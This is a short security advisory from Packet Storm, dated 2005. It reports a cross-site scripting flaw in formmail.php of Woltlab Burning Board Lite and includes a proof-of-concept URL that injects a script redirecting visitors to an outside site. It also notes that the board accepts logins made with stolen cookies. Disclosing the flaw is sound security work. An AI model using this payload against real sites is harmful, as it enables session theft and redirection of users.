woltlabXSS.txt

2005-01-11T00:00:00
ID PACKETSTORM:35650
Type packetstorm
Reporter Martin Heistermann
Modified 2005-01-11T00:00:00

Description

                                        
                                            `  
  
Advisory Information  
--------------------  
Advisory name : Woltlab Burning Board Lite formmail.php XSS  
Discovered by : drhankey / it-security23.net  
Vendor Name : Woltlab  
Vendor Homepage : http://www.woltlab.de  
Software : Woltlab Burning Board Lite  
Vulnerability Type : Cross-Site-Scripting  
Vulnerable Versions : 1.0.0, 1.0.1e, maybe more  
Platforms : OS Independent, PHP  
  
  
What is Woltlab Burning Board Lite?  
----------------------------------  
Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,  
a PHP based bulletin board  
  
  
Vulnerability Description:  
-------------------------  
formmail.php outputs the "userid"-parameter unfiltered, so its possible to add arbitary Code to the output by using a malformed link.  
The Board also allows logging in with stolen cookies.  
  
Proof of Concept:  
-----------------  
http://website/board/formmail.php?userid=1"><script>document.location.href="http://www.it-security23.net";</script x="y  
`